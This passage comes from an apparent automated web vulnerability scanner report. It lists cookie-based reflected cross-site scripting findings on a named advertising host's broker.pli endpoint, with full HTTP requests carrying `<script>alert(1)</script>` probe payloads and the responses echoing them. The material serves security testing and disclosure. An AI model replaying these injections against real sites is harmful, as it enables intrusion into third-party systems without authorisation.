12:25:26 2011&prad=242390405&arc=206438244&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": 'method->-1,ts->130822588165620<script>alert(1)</script>61b5de1651b', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:
...[SNIP]...

3.198. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 3e1b4<script>alert(1)</script>a27c838e377 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-13056631723e1b4<script>alert(1)</script>a27c838e377

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:29 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '4a757a7-24.143.206.42-13056631723e1b4<script>alert(1)</script>a27c838e377', "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:
...[SNIP]...

3.199. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload 8b972<script>alert(1)</script>e7d656eaf4a was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&8b972<script>alert(1)</script>e7d656eaf4a; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:26 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&8b972<script>alert(1)</script>e7d656eaf4a', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=6&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:
...[SNIP]...

3.200. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload bb845<script>alert(1)</script>9f0f3ccb1a2 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&bb845<script>alert(1)</script>9f0f3ccb1a2; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:26 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&bb845<script>alert(1)</script>9f0f3ccb1a2', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.201. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 43801<script>alert(1)</script>57e8907dd5e was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&43801<script>alert(1)</script>57e8907dd5e; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:28 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
ay 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&43801<script>alert(1)</script>57e8907dd5e', "ar_p97174789": 'exp=6&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:25:26 2011&prad=242390405&arc=206438244&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.202. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload 247ee<script>alert(1)</script>85ca4aaf976 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=242390405&AR_C=206438244 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&247ee<script>alert(1)</script>85ca4aaf976; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:27 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26215

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&247ee<script>alert(1)</script>85ca4aaf976', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

3.203. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 726b0<script>alert(1)</script>fbebf95c3f4 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=314453502&AR_C=210323172 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C; ar_p97174789=exp=10&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 18:06:41 2011&prad=242390405&arc=178114119&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&726b0<script>alert(1)</script>fbebf95c3f4; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 18:32:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=12&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 18:32:46 2011&prad=314453502&arc=210323172&; expires=Wed 14-Sep-2011 18:32:46 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
